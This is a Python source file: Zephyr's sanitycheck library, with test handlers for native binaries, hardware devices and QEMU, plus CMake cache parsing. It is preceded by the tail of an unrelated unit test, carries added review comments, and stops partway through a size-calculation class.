for executor_hook, hook in zip(hook_methods, hooks):
setattr(executor, executor_hook, hook)
with self.assertRaises(CellExecutionError):
executor.execute_cell(cell_mock, 0)
for hook in hooks[:4]:
hook.assert_called_once_with(cell=cell_mock, cell_index=0)
for hook in hooks[4:]:
hook.assert_not_called()
|
sanitylib.py | #!/usr/bin/env python3
# vim: set syntax=python ts=4 :
#
# Copyright (c) 2018 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import os
import contextlib
import string
import mmap
import sys
import re
import subprocess
import select
import shutil
import shlex
import signal
import threading
import concurrent.futures
from collections import OrderedDict
from threading import BoundedSemaphore
import queue
import time
import csv
import glob
import concurrent
import xml.etree.ElementTree as ET
import logging
import pty
from pathlib import Path
import traceback
from distutils.spawn import find_executable
from colorama import Fore
import pickle
import platform
import yaml
try:
# Use the C LibYAML parser if available, rather than the Python parser.
# It's much faster.
from yaml import CSafeLoader as SafeLoader
from yaml import CDumper as Dumper
except ImportError:
from yaml import SafeLoader, Dumper
try:
import serial
except ImportError:
print("Install pyserial python module with pip to use --device-testing option.")
try:
from tabulate import tabulate
except ImportError:
print("Install tabulate python module with pip to use --device-testing option.")
try:
import psutil
except ImportError:
print("Install psutil python module with pip to run in Qemu.")
# Root of the Zephyr tree; all helper-script paths are resolved against it.
ZEPHYR_BASE = os.getenv("ZEPHYR_BASE")
if not ZEPHYR_BASE:
    sys.exit("$ZEPHYR_BASE environment variable undefined")

# This is needed to load edt.pickle files.
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts", "dts"))
import edtlib  # pylint: disable=unused-import

# Locks guarding shared hardware-map and report state across worker threads.
hw_map_local = threading.Lock()
report_lock = threading.Lock()

# Use this for internal comparisons; that's what canonicalization is
# for. Don't use it when invoking other components of the build system
# to avoid confusing and hard to trace inconsistencies in error messages
# and logs, generated Makefiles, etc. compared to when users invoke these
# components directly.
# Note "normalization" is different from canonicalization, see os.path.
canonical_zephyr_base = os.path.realpath(ZEPHYR_BASE)

sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/"))

from sanity_chk import scl
from sanity_chk import expr_parser

logger = logging.getLogger('sanitycheck')
logger.setLevel(logging.DEBUG)

# LIFO work queue shared by the build/run pipeline workers.
pipeline = queue.LifoQueue()
class CMakeCacheEntry:
    '''Represents a CMake cache entry.

    This class understands the type system in a CMakeCache.txt, and
    converts the following cache types to Python types:

      Cache Type    Python type
      ----------    -------------------------------------------
      FILEPATH      str
      PATH          str
      STRING        str OR list of str (if ';' is in the value)
      BOOL          bool
      INTERNAL      str OR list of str (if ';' is in the value)
      ----------    -------------------------------------------
    '''

    # Regular expression for a cache entry.
    #
    # CMake variable names can include escape characters, allowing a
    # wider set of names than is easy to match with a regular
    # expression. To be permissive here, use a non-greedy match up to
    # the first colon (':'). This breaks if the variable name has a
    # colon inside, but it's good enough.
    CACHE_ENTRY = re.compile(
        r'''(?P<name>.*?)                               # name
         :(?P<type>FILEPATH|PATH|STRING|BOOL|INTERNAL)  # type
         =(?P<value>.*)                                 # value
        ''', re.X)

    @classmethod
    def _to_bool(cls, val):
        # Convert a CMake BOOL string into a Python bool.
        #
        #   "True if the constant is 1, ON, YES, TRUE, Y, or a
        #   non-zero number. False if the constant is 0, OFF, NO,
        #   FALSE, N, IGNORE, NOTFOUND, the empty string, or ends in
        #   the suffix -NOTFOUND. Named boolean constants are
        #   case-insensitive. If the argument is not one of these
        #   constants, it is treated as a variable."
        #
        # https://cmake.org/cmake/help/v3.0/command/if.html
        #
        # BUG FIX: previously returned the ints 1/0 for the named
        # constants, contradicting the class docstring's "BOOL -> bool";
        # now returns real booleans (backward compatible, bool is an int).
        val = val.upper()
        if val in ('ON', 'YES', 'TRUE', 'Y'):
            return True
        elif val in ('OFF', 'NO', 'FALSE', 'N', 'IGNORE', 'NOTFOUND', ''):
            return False
        elif val.endswith('-NOTFOUND'):
            return False
        else:
            try:
                v = int(val)
                return v != 0
            except ValueError as exc:
                raise ValueError('invalid bool {}'.format(val)) from exc

    @classmethod
    def from_line(cls, line, line_no):
        """Parse one CMakeCache.txt line into a CMakeCacheEntry or None.

        @param line Raw text of the line
        @param line_no Line number, used only in error messages
        @return CMakeCacheEntry, or None for comments/blank/unparsable lines
        @raise ValueError for a malformed BOOL value
        """
        # Comments can only occur at the beginning of a line.
        # (The value of an entry could contain a comment character).
        if line.startswith('//') or line.startswith('#'):
            return None

        # Whitespace-only lines do not contain cache entries.
        if not line.strip():
            return None

        m = cls.CACHE_ENTRY.match(line)
        if not m:
            return None

        name, type_, value = (m.group(g) for g in ('name', 'type', 'value'))
        if type_ == 'BOOL':
            try:
                value = cls._to_bool(value)
            except ValueError as exc:
                args = exc.args + ('on line {}: {}'.format(line_no, line),)
                raise ValueError(args) from exc
        elif type_ in ['STRING', 'INTERNAL']:
            # If the value is a CMake list (i.e. is a string which
            # contains a ';'), convert to a Python list.
            if ';' in value:
                value = value.split(';')

        return CMakeCacheEntry(name, value)

    def __init__(self, name, value):
        self.name = name
        self.value = value

    def __str__(self):
        fmt = 'CMakeCacheEntry(name={}, value={})'
        return fmt.format(self.name, self.value)
class CMakeCache:
    '''Parses and represents a CMake cache file.'''

    @staticmethod
    def from_file(cache_file):
        """Alternate constructor: parse *cache_file* into a CMakeCache."""
        return CMakeCache(cache_file)

    def __init__(self, cache_file):
        self.cache_file = cache_file
        self.load(cache_file)

    def load(self, cache_file):
        """(Re)load all entries from *cache_file*, replacing prior state."""
        with open(cache_file, 'r') as cache:
            parsed = [CMakeCacheEntry.from_line(text, number)
                      for number, text in enumerate(cache)]
        # Keep only real entries, keyed by name, preserving file order.
        self._entries = OrderedDict((item.name, item)
                                    for item in parsed if item)

    def get(self, name, default=None):
        """Return the cached value for *name*, or *default* when absent."""
        entry = self._entries.get(name)
        if entry is None:
            return default
        return entry.value

    def get_list(self, name, default=None):
        """Return the value for *name* coerced to a list of strings."""
        if default is None:
            default = []
        entry = self._entries.get(name)
        if entry is None:
            return default
        value = entry.value
        if isinstance(value, list):
            return value
        if isinstance(value, str):
            # A non-empty scalar becomes a one-element list.
            return [value] if value else []
        msg = 'invalid value {} type {}'
        raise RuntimeError(msg.format(value, type(value)))

    def __contains__(self, name):
        return name in self._entries

    def __getitem__(self, name):
        return self._entries[name].value

    def __setitem__(self, name, entry):
        if not isinstance(entry, CMakeCacheEntry):
            msg = 'improper type {} for value {}, expecting CMakeCacheEntry'
            raise TypeError(msg.format(type(entry), entry))
        self._entries[name] = entry

    def __delitem__(self, name):
        del self._entries[name]

    def __iter__(self):
        return iter(self._entries.values())
class SanityCheckException(Exception):
    """Base class for all sanitycheck-specific errors."""
    pass
class SanityRuntimeError(SanityCheckException):
    """Raised for unrecoverable runtime problems (e.g. bad ELF input)."""
    pass
class ConfigurationError(SanityCheckException):
    """Error in a configuration/test-case file, prefixed with its path."""

    def __init__(self, cfile, message):
        # Prepend the offending file name to the message.
        super().__init__("{}: {}".format(cfile, message))
class BuildError(SanityCheckException):
    """Raised when a test image fails to build."""
    pass
class ExecutionError(SanityCheckException):
    """Raised when running a built test image fails."""
    pass
class HarnessImporter:
    """Dynamically instantiates a harness class from scripts/sanity_chk/harness.py."""

    def __init__(self, name):
        sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/sanity_chk"))
        module = __import__("harness")
        # Fall back to the generic "Test" harness when no name is given.
        harness_class = getattr(module, name if name else "Test")
        self.instance = harness_class()
class Handler:
    """Base class for running a built test image and tracking its outcome."""

    def __init__(self, instance, type_str="build"):
        """Constructor

        @param instance Test instance this handler runs/monitors
        @param type_str Handler flavor, e.g. "build", "device", "qemu"
        """
        self.lock = threading.Lock()

        self.state = "waiting"
        self.run = False
        self.duration = 0
        self.type_str = type_str

        self.binary = None
        self.pid_fn = None
        self.call_make_run = False

        self.name = instance.name
        self.instance = instance
        self.timeout = instance.testcase.timeout
        self.sourcedir = instance.testcase.source_dir
        self.build_dir = instance.build_dir
        self.log = os.path.join(self.build_dir, "handler.log")
        self.returncode = 0
        self.set_state("running", self.duration)

        self.generator = None
        self.generator_cmd = None

        self.args = []

    def set_state(self, state, duration):
        """Atomically update the (state, duration) pair."""
        self.lock.acquire()
        self.state = state
        self.duration = duration
        self.lock.release()

    def get_state(self):
        """Atomically read the (state, duration) pair."""
        self.lock.acquire()
        ret = (self.state, self.duration)
        self.lock.release()
        return ret

    def record(self, harness):
        """Append the harness recording (if any) to <build_dir>/recording.csv."""
        if harness.recording:
            filename = os.path.join(self.build_dir, "recording.csv")
            with open(filename, "at") as csvfile:
                # BUG FIX: harness.fieldnames was previously passed as the
                # positional ``dialect`` argument of csv.writer(), where it
                # was silently ignored. The header row is written explicitly
                # below, so no dialect override is needed.
                cw = csv.writer(csvfile, lineterminator=os.linesep)
                cw.writerow(harness.fieldnames)
                for instance in harness.recording:
                    cw.writerow(instance)
class BinaryHandler(Handler):
    """Runs a natively-built test binary on the host and scrapes its output."""

    def __init__(self, instance, type_str):
        """Constructor

        @param instance Test Instance
        """
        super().__init__(instance, type_str)

        # Set once terminate() runs, so a kill-induced non-zero exit code
        # is not mistaken for a real test failure.
        self.terminated = False

        # Tool options
        self.valgrind = False
        self.lsan = False
        self.asan = False
        self.ubsan = False
        self.coverage = False

    def try_kill_process_by_pid(self):
        """SIGTERM the process whose pid is recorded in self.pid_fn, if any."""
        if self.pid_fn:
            pid = int(open(self.pid_fn).read())
            os.unlink(self.pid_fn)
            self.pid_fn = None  # clear so we don't try to kill the binary twice
            try:
                os.kill(pid, signal.SIGTERM)
            except ProcessLookupError:
                # Already gone; nothing to do.
                pass

    def terminate(self, proc):
        # encapsulate terminate functionality so we do it consistently where ever
        # we might want to terminate the proc. We need try_kill_process_by_pid
        # because of both how newer ninja (1.6.0 or greater) and .NET / renode
        # work. Newer ninja's don't seem to pass SIGTERM down to the children
        # so we need to use try_kill_process_by_pid.
        self.try_kill_process_by_pid()
        proc.terminate()
        # sleep for a while before attempting to kill
        time.sleep(0.5)
        proc.kill()
        self.terminated = True

    def _output_reader(self, proc, harness):
        """Thread body: stream the binary's stdout into the log and harness."""
        log_out_fp = open(self.log, "wt")
        for line in iter(proc.stdout.readline, b''):
            logger.debug("OUTPUT: {0}".format(line.decode('utf-8').rstrip()))
            log_out_fp.write(line.decode('utf-8'))
            log_out_fp.flush()
            harness.handle(line.decode('utf-8').rstrip())
            if harness.state:
                try:
                    # POSIX arch based ztests end on their own,
                    # so let's give it up to 100ms to do so
                    proc.wait(0.1)
                except subprocess.TimeoutExpired:
                    self.terminate(proc)
                break
        log_out_fp.close()

    def handle(self):
        """Build the command line, run the binary, and record the verdict."""
        harness_name = self.instance.testcase.harness.capitalize()
        harness_import = HarnessImporter(harness_name)
        harness = harness_import.instance
        harness.configure(self.instance)

        if self.call_make_run:
            command = [self.generator_cmd, "run"]
        else:
            command = [self.binary]

        run_valgrind = False
        if self.valgrind and shutil.which("valgrind"):
            command = ["valgrind", "--error-exitcode=2",
                       "--leak-check=full",
                       "--suppressions=" + ZEPHYR_BASE + "/scripts/valgrind.supp",
                       "--log-file=" + self.build_dir + "/valgrind.log"
                       ] + command
            run_valgrind = True

        logger.debug("Spawning process: " +
                     " ".join(shlex.quote(word) for word in command) + os.linesep +
                     "in directory: " + self.build_dir)

        start_time = time.time()

        env = os.environ.copy()
        if self.asan:
            env["ASAN_OPTIONS"] = "log_path=stdout:" + \
                                  env.get("ASAN_OPTIONS", "")
            if not self.lsan:
                env["ASAN_OPTIONS"] += "detect_leaks=0"

        if self.ubsan:
            env["UBSAN_OPTIONS"] = "log_path=stdout:halt_on_error=1:" + \
                                   env.get("UBSAN_OPTIONS", "")

        with subprocess.Popen(command, stdout=subprocess.PIPE,
                              stderr=subprocess.PIPE, cwd=self.build_dir, env=env) as proc:
            logger.debug("Spawning BinaryHandler Thread for %s" % self.name)
            t = threading.Thread(target=self._output_reader, args=(proc, harness,), daemon=True)
            t.start()
            t.join(self.timeout)
            if t.is_alive():
                self.terminate(proc)
                t.join()
            proc.wait()
            self.returncode = proc.returncode

        handler_time = time.time() - start_time

        if self.coverage:
            # NOTE(review): with shell=True and a list argument, only the
            # first element ("GCOV_PREFIX=...") is run as the shell command;
            # "gcov" and its arguments become positional shell parameters,
            # so gcov is likely never executed — confirm intent.
            subprocess.call(["GCOV_PREFIX=" + self.build_dir,
                             "gcov", self.sourcedir, "-b", "-s", self.build_dir], shell=True)

        self.try_kill_process_by_pid()

        # FIXME: This is needed when killing the simulator, the console is
        # garbled and needs to be reset. Did not find a better way to do that.

        subprocess.call(["stty", "sane"])
        self.instance.results = harness.tests

        if not self.terminated and self.returncode != 0:
            # When a process is killed, the default handler returns 128 + SIGTERM
            # so in that case the return code itself is not meaningful
            self.set_state("failed", handler_time)
            self.instance.reason = "Failed"
        elif run_valgrind and self.returncode == 2:
            self.set_state("failed", handler_time)
            self.instance.reason = "Valgrind error"
        elif harness.state:
            self.set_state(harness.state, handler_time)
            if harness.state == "failed":
                self.instance.reason = "Failed"
        else:
            self.set_state("timeout", handler_time)
            self.instance.reason = "Timeout"

        self.record(harness)
class DeviceHandler(Handler):
    """Flashes a test image onto connected hardware and monitors its serial output."""

    def __init__(self, instance, type_str):
        """Constructor

        @param instance Test Instance
        """
        super().__init__(instance, type_str)

        # Back-reference to the owning TestSuite; provides the hardware map.
        self.suite = None

    def monitor_serial(self, ser, halt_fileno, harness):
        """Thread body: read serial output until halted, closed, or done."""
        log_out_fp = open(self.log, "wt")

        ser_fileno = ser.fileno()
        readlist = [halt_fileno, ser_fileno]

        while ser.isOpen():
            readable, _, _ = select.select(readlist, [], [], self.timeout)

            if halt_fileno in readable:
                logger.debug('halted')
                ser.close()
                break
            if ser_fileno not in readable:
                continue  # Timeout.

            serial_line = None
            try:
                serial_line = ser.readline()
            except TypeError:
                pass
            except serial.SerialException:
                ser.close()
                break

            # Just because ser_fileno has data doesn't mean an entire line
            # is available yet.
            if serial_line:
                sl = serial_line.decode('utf-8', 'ignore').lstrip()
                logger.debug("DEVICE: {0}".format(sl.rstrip()))

                log_out_fp.write(sl)
                log_out_fp.flush()
                harness.handle(sl.rstrip())

            if harness.state:
                ser.close()
                break

        log_out_fp.close()

    def device_is_available(self, instance):
        """Return True when a matching, unclaimed device exists in the map."""
        device = instance.platform.name
        fixture = instance.testcase.harness_config.get("fixture")
        for i in self.suite.connected_hardware:
            if fixture and fixture not in i.get('fixtures', []):
                continue
            if i['platform'] == device and i['available'] and (i['serial'] or i.get('serial_pty', None)):
                return True

        return False

    def get_available_device(self, instance):
        """Claim and return the map entry for an available matching device."""
        device = instance.platform.name
        for i in self.suite.connected_hardware:
            if i['platform'] == device and i['available'] and (i['serial'] or i.get('serial_pty', None)):
                i['available'] = False
                i['counter'] += 1
                return i

        return None

    def make_device_available(self, serial):
        """Release the device bound to *serial* back into the pool."""
        with hw_map_local:
            for i in self.suite.connected_hardware:
                # NOTE(review): the second operand only checks that the
                # entry HAS a serial_pty, not that it matches *serial*, so
                # every pty-backed device is re-enabled here — confirm
                # whether this should be i.get('serial_pty') == serial.
                if i['serial'] == serial or i.get('serial_pty', None):
                    i['available'] = True

    @staticmethod
    def run_custom_script(script, timeout):
        """Run a user-supplied hook script, killing it after *timeout* seconds."""
        with subprocess.Popen(script, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
            try:
                stdout, _ = proc.communicate(timeout=timeout)
                logger.debug(stdout.decode())
            except subprocess.TimeoutExpired:
                proc.kill()
                proc.communicate()
                logger.error("{} timed out".format(script))

    def handle(self):
        """Claim a device, flash the image, monitor serial, record results."""
        out_state = "failed"

        # Block until a matching device is free.
        while not self.device_is_available(self.instance):
            logger.debug("Waiting for device {} to become available".format(self.instance.platform.name))
            time.sleep(1)

        hardware = self.get_available_device(self.instance)
        if hardware:
            runner = hardware.get('runner', None) or self.suite.west_runner

        serial_pty = hardware.get('serial_pty', None)
        if serial_pty:
            # The "serial" is actually a program providing a pty.
            master, slave = pty.openpty()
            try:
                ser_pty_process = subprocess.Popen(serial_pty, stdout=master, stdin=master, stderr=master)
            except subprocess.CalledProcessError as error:
                logger.error("Failed to run subprocess {}, error {}".format(serial_pty, error.output))
                return

            serial_device = os.ttyname(slave)
        else:
            serial_device = hardware['serial']

        logger.debug("Using serial device {}".format(serial_device))

        if (self.suite.west_flash is not None) or runner:
            command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
            command_extra_args = []

            # There are three ways this option is used.
            # 1) bare: --west-flash
            #    This results in options.west_flash == []
            # 2) with a value: --west-flash="--board-id=42"
            #    This results in options.west_flash == "--board-id=42"
            # 3) Multiple values: --west-flash="--board-id=42,--erase"
            #    This results in options.west_flash == "--board-id=42 --erase"
            if self.suite.west_flash and self.suite.west_flash != []:
                command_extra_args.extend(self.suite.west_flash.split(','))

            if runner:
                command.append("--runner")
                command.append(runner)

                # Map the hardware-map board id onto the runner-specific
                # command-line option that selects a probe/board.
                board_id = hardware.get("probe_id", hardware.get("id", None))
                product = hardware.get("product", None)
                if board_id is not None:
                    if runner == "pyocd":
                        command_extra_args.append("--board-id")
                        command_extra_args.append(board_id)
                    elif runner == "nrfjprog":
                        command_extra_args.append("--snr")
                        command_extra_args.append(board_id)
                    elif runner == "openocd" and product == "STM32 STLink":
                        command_extra_args.append("--cmd-pre-init")
                        command_extra_args.append("hla_serial %s" % (board_id))
                    elif runner == "openocd" and product == "STLINK-V3":
                        command_extra_args.append("--cmd-pre-init")
                        command_extra_args.append("hla_serial %s" % (board_id))
                    elif runner == "openocd" and product == "EDBG CMSIS-DAP":
                        command_extra_args.append("--cmd-pre-init")
                        command_extra_args.append("cmsis_dap_serial %s" % (board_id))
                    elif runner == "jlink":
                        command.append("--tool-opt=-SelectEmuBySN %s" % (board_id))

            if command_extra_args != []:
                command.append('--')
                command.extend(command_extra_args)
        else:
            command = [self.generator_cmd, "-C", self.build_dir, "flash"]

        try:
            ser = serial.Serial(
                serial_device,
                baudrate=115200,
                parity=serial.PARITY_NONE,
                stopbits=serial.STOPBITS_ONE,
                bytesize=serial.EIGHTBITS,
                timeout=self.timeout
            )
        except serial.SerialException as e:
            self.set_state("failed", 0)
            self.instance.reason = "Failed"
            logger.error("Serial device error: %s" % (str(e)))

            if serial_pty:
                ser_pty_process.terminate()
                outs, errs = ser_pty_process.communicate()
                logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))

            self.make_device_available(serial_device)
            return

        ser.flush()

        harness_name = self.instance.testcase.harness.capitalize()
        harness_import = HarnessImporter(harness_name)
        harness = harness_import.instance
        harness.configure(self.instance)
        # Pipe used only to signal the serial-monitor thread to halt.
        read_pipe, write_pipe = os.pipe()
        start_time = time.time()

        pre_script = hardware.get('pre_script')
        post_flash_script = hardware.get('post_flash_script')
        post_script = hardware.get('post_script')

        if pre_script:
            self.run_custom_script(pre_script, 30)

        t = threading.Thread(target=self.monitor_serial, daemon=True,
                             args=(ser, read_pipe, harness))
        t.start()

        d_log = "{}/device.log".format(self.instance.build_dir)
        logger.debug('Flash command: %s', command)
        try:
            stdout = stderr = None
            with subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
                try:
                    (stdout, stderr) = proc.communicate(timeout=30)
                    logger.debug(stdout.decode())

                    if proc.returncode != 0:
                        self.instance.reason = "Device issue (Flash?)"
                        with open(d_log, "w") as dlog_fp:
                            dlog_fp.write(stderr.decode())
                except subprocess.TimeoutExpired:
                    proc.kill()
                    (stdout, stderr) = proc.communicate()
                    self.instance.reason = "Device issue (Timeout)"
                    with open(d_log, "w") as dlog_fp:
                        dlog_fp.write(stderr.decode())
        except subprocess.CalledProcessError:
            os.write(write_pipe, b'x')  # halt the thread

        if post_flash_script:
            self.run_custom_script(post_flash_script, 30)

        t.join(self.timeout)
        if t.is_alive():
            logger.debug("Timed out while monitoring serial output on {}".format(self.instance.platform.name))
            out_state = "timeout"

        if ser.isOpen():
            ser.close()

        if serial_pty:
            ser_pty_process.terminate()
            outs, errs = ser_pty_process.communicate()
            logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))

        os.close(write_pipe)
        os.close(read_pipe)

        handler_time = time.time() - start_time

        if out_state == "timeout":
            # Mark every test case the harness never reported as blocked.
            for c in self.instance.testcase.cases:
                if c not in harness.tests:
                    harness.tests[c] = "BLOCK"

            self.instance.reason = "Timeout"

        self.instance.results = harness.tests

        if harness.state:
            self.set_state(harness.state, handler_time)
            if harness.state == "failed":
                self.instance.reason = "Failed"
        else:
            self.set_state(out_state, handler_time)

        if post_script:
            self.run_custom_script(post_script, 30)

        self.make_device_available(serial_device)

        self.record(harness)
class QEMUHandler(Handler):
    """Spawns a thread to monitor QEMU output from pipes

    We pass QEMU_PIPE to 'make run' and monitor the pipes for output.
    We need to do this as once qemu starts, it runs forever until killed.
    Test cases emit special messages to the console as they run, we check
    for these to collect whether the test passed or failed.
    """

    def __init__(self, instance, type_str):
        """Constructor

        @param instance Test instance
        """

        super().__init__(instance, type_str)
        self.fifo_fn = os.path.join(instance.build_dir, "qemu-fifo")

        self.pid_fn = os.path.join(instance.build_dir, "qemu.pid")

    @staticmethod
    def _get_cpu_time(pid):
        """get process CPU time.

        The guest virtual time in QEMU icount mode isn't host time and
        it's maintained by counting guest instructions, so we use QEMU
        process exection time to mostly simulate the time of guest OS.
        """
        proc = psutil.Process(pid)
        cpu_time = proc.cpu_times()
        return cpu_time.user + cpu_time.system

    @staticmethod
    def _thread(handler, timeout, outdir, logfile, fifo_fn, pid_fn, results, harness):
        """Worker: create the fifos, poll QEMU's output and drive the harness."""
        fifo_in = fifo_fn + ".in"
        fifo_out = fifo_fn + ".out"

        # These in/out nodes are named from QEMU's perspective, not ours
        if os.path.exists(fifo_in):
            os.unlink(fifo_in)
        os.mkfifo(fifo_in)
        if os.path.exists(fifo_out):
            os.unlink(fifo_out)
        os.mkfifo(fifo_out)

        # We don't do anything with out_fp but we need to open it for
        # writing so that QEMU doesn't block, due to the way pipes work
        out_fp = open(fifo_in, "wb")
        # Disable internal buffering, we don't
        # want read() or poll() to ever block if there is data in there
        in_fp = open(fifo_out, "rb", buffering=0)
        log_out_fp = open(logfile, "wt")

        start_time = time.time()
        timeout_time = start_time + timeout
        p = select.poll()
        p.register(in_fp, select.POLLIN)
        out_state = None

        line = ""
        timeout_extended = False

        pid = 0
        if os.path.exists(pid_fn):
            pid = int(open(pid_fn).read())

        while True:
            this_timeout = int((timeout_time - time.time()) * 1000)
            if this_timeout < 0 or not p.poll(this_timeout):
                try:
                    if pid and this_timeout > 0:
                        # there's possibility we polled nothing because
                        # of not enough CPU time scheduled by host for
                        # QEMU process during p.poll(this_timeout)
                        cpu_time = QEMUHandler._get_cpu_time(pid)
                        if cpu_time < timeout and not out_state:
                            timeout_time = time.time() + (timeout - cpu_time)
                            continue
                except ProcessLookupError:
                    out_state = "failed"
                    break
                if not out_state:
                    out_state = "timeout"
                break

            if pid == 0 and os.path.exists(pid_fn):
                pid = int(open(pid_fn).read())

            try:
                c = in_fp.read(1).decode("utf-8")
            except UnicodeDecodeError:
                # Test is writing something weird, fail
                out_state = "unexpected byte"
                break

            if c == "":
                # EOF, this shouldn't happen unless QEMU crashes
                out_state = "unexpected eof"
                break
            line = line + c
            if c != "\n":
                continue

            # line contains a full line of data output from QEMU
            log_out_fp.write(line)
            log_out_fp.flush()
            line = line.strip()
            logger.debug("QEMU: %s" % line)

            harness.handle(line)
            if harness.state:
                # if we have registered a fail make sure the state is not
                # overridden by a false success message coming from the
                # testsuite
                if out_state not in ['failed', 'unexpected eof', 'unexpected byte']:
                    out_state = harness.state

                # if we get some state, that means test is doing well, we reset
                # the timeout and wait for 2 more seconds to catch anything
                # printed late. We wait much longer if code
                # coverage is enabled since dumping this information can
                # take some time.
                if not timeout_extended or harness.capture_coverage:
                    timeout_extended = True
                    if harness.capture_coverage:
                        timeout_time = time.time() + 30
                    else:
                        timeout_time = time.time() + 2
            line = ""

        handler.record(harness)

        handler_time = time.time() - start_time
        logger.debug("QEMU complete (%s) after %f seconds" %
                     (out_state, handler_time))

        if out_state == "timeout":
            handler.instance.reason = "Timeout"
            handler.set_state("failed", handler_time)
        elif out_state == "failed":
            handler.instance.reason = "Failed"
            handler.set_state("failed", handler_time)
        elif out_state in ['unexpected eof', 'unexpected byte']:
            handler.instance.reason = out_state
            handler.set_state("failed", handler_time)
        else:
            handler.set_state(out_state, handler_time)

        log_out_fp.close()
        out_fp.close()
        in_fp.close()
        if pid:
            try:
                if pid:
                    os.kill(pid, signal.SIGTERM)
            except ProcessLookupError:
                # Oh well, as long as it's dead! User probably sent Ctrl-C
                pass

        os.unlink(fifo_in)
        os.unlink(fifo_out)

    def handle(self):
        """Start the monitor thread, invoke the generator's run target, reap QEMU."""
        self.results = {}
        self.run = True

        # We pass this to QEMU which looks for fifos with .in and .out
        # suffixes.

        self.fifo_fn = os.path.join(self.instance.build_dir, "qemu-fifo")
        self.pid_fn = os.path.join(self.instance.build_dir, "qemu.pid")
        if os.path.exists(self.pid_fn):
            os.unlink(self.pid_fn)

        self.log_fn = self.log

        harness_import = HarnessImporter(self.instance.testcase.harness.capitalize())
        harness = harness_import.instance
        harness.configure(self.instance)
        self.thread = threading.Thread(name=self.name, target=QEMUHandler._thread,
                                       args=(self, self.timeout, self.build_dir,
                                             self.log_fn, self.fifo_fn,
                                             self.pid_fn, self.results, harness))

        self.instance.results = harness.tests
        self.thread.daemon = True
        logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
        self.thread.start()
        subprocess.call(["stty", "sane"])

        logger.debug("Running %s (%s)" % (self.name, self.type_str))
        command = [self.generator_cmd]
        command += ["-C", self.build_dir, "run"]

        with subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=self.build_dir) as proc:
            logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
            try:
                proc.wait(self.timeout)
            except subprocess.TimeoutExpired:
                # sometimes QEMU can't handle SIGTERM signal correctly
                # in that case kill -9 QEMU process directly and leave
                # sanitycheck judge testing result by console output
                if os.path.exists(self.pid_fn):
                    qemu_pid = int(open(self.pid_fn).read())
                    try:
                        os.kill(qemu_pid, signal.SIGKILL)
                    except ProcessLookupError:
                        pass
                    proc.wait()
                    if harness.state == "passed":
                        self.returncode = 0
                    else:
                        self.returncode = proc.returncode
                else:
                    proc.terminate()
                    proc.kill()
                    self.returncode = proc.returncode
            else:
                # NOTE(review): this logs the pre-existing value of
                # self.returncode (0 from Handler.__init__), not the exit
                # code assigned on the next line — confirm intent.
                logger.debug(f"No timeout, return code from qemu: {self.returncode}")
                self.returncode = proc.returncode

            if os.path.exists(self.pid_fn):
                os.unlink(self.pid_fn)

        logger.debug(f"return code from qemu: {self.returncode}")
        if self.returncode != 0 or not harness.state:
            self.set_state("failed", 0)
            self.instance.reason = "Exited with {}".format(self.returncode)

    def get_fifo(self):
        """Return the base path of the QEMU fifo pair."""
        return self.fifo_fn
class SizeCalculator:
    """Computes RAM/ROM usage of an ELF binary from its objdump section table."""

    # Sections that consume RAM only (zero-init / noinit data).
    alloc_sections = [
        "bss",
        "noinit",
        "app_bss",
        "app_noinit",
        "ccm_bss",
        "ccm_noinit"
    ]

    # Sections that consume both ROM (initial image) and RAM (runtime copy).
    rw_sections = [
        "datas",
        "initlevel",
        "exceptions",
        "initshell",
        "_static_thread_data_area",
        "k_timer_area",
        "k_mem_slab_area",
        "k_mem_pool_area",
        "sw_isr_table",
        "k_sem_area",
        "k_mutex_area",
        "app_shmem_regions",
        "_k_fifo_area",
        "_k_lifo_area",
        "k_stack_area",
        "k_msgq_area",
        "k_mbox_area",
        "k_pipe_area",
        "net_if",
        "net_if_dev",
        "net_l2_data",
        "k_queue_area",
        "_net_buf_pool_area",
        "app_datas",
        "kobject_data",
        "mmu_tables",
        "app_pad",
        "priv_stacks",
        "ccm_data",
        "usb_descriptor",
        "usb_data", "usb_bos_desc",
        "uart_mux",
        'log_backends_sections',
        'log_dynamic_sections',
        'log_const_sections',
        "app_smem",
        'shell_root_cmds_sections',
        # NOTE(review): 'log_const_sections' appears twice in this list;
        # the duplicate is harmless (membership test) but could be removed.
        'log_const_sections',
        "font_entry_sections",
        "priv_stacks_noinit",
        "_GCOV_BSS_SECTION_NAME",
        "gcov",
        "nocache"
    ]

    # These get copied into RAM only on non-XIP
    ro_sections = [
        "rom_start",
        "text",
        "ctors",
        "init_array",
        "reset",
        "z_object_assignment_area",
        "rodata",
        "devconfig",
        "net_l2",
        "vector",
        "sw_isr_table",
        "settings_handler_static_area",
        "bt_l2cap_fixed_chan",
        "bt_l2cap_br_fixec_chan",
        "bt_gatt_service_static",
        "vectors",
        "net_socket_register_area",
        "net_ppp_proto",
        "shell_area",
        "tracing_backend_area",
    ]

    def __init__(self, filename, extra_sections):
        """Constructor

        @param filename Path to the output binary
            The <filename> is parsed by objdump to determine section sizes
        @param extra_sections Additional section names to treat as recognized
        """
        # Make sure this is an ELF binary
        with open(filename, "rb") as f:
            magic = f.read(4)

        try:
            if magic != b'\x7fELF':
                raise SanityRuntimeError("%s is not an ELF binary" % filename)
        except Exception as e:
            print(str(e))
            sys.exit(2)

        # Search for CONFIG_XIP in the ELF's list of symbols using NM and AWK.
        # GREP can not be used as it returns an error if the symbol is not
        # found.
        is_xip_command = "nm " + filename + \
                         " | awk '/CONFIG_XIP/ { print $3 }'"
        is_xip_output = subprocess.check_output(
            is_xip_command, shell=True, stderr=subprocess.STDOUT).decode(
            "utf-8").strip()
        try:
            if is_xip_output.endswith("no symbols"):
                raise SanityRuntimeError("%s has no symbol information" % filename)
        except Exception as e:
            print(str(e))
            sys.exit(2)

        # Non-empty output means the CONFIG_XIP symbol exists.
